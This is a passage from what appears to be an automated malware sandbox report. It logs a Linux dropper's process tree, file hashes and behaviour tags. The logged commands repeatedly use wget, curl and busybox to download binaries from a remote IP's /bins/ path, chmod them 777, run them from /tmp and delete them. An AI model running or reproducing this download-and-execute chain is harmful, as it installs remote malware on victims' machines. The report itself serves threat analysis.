- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:939
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:945
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:951
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:957
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:963
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:969
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
PID:974
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97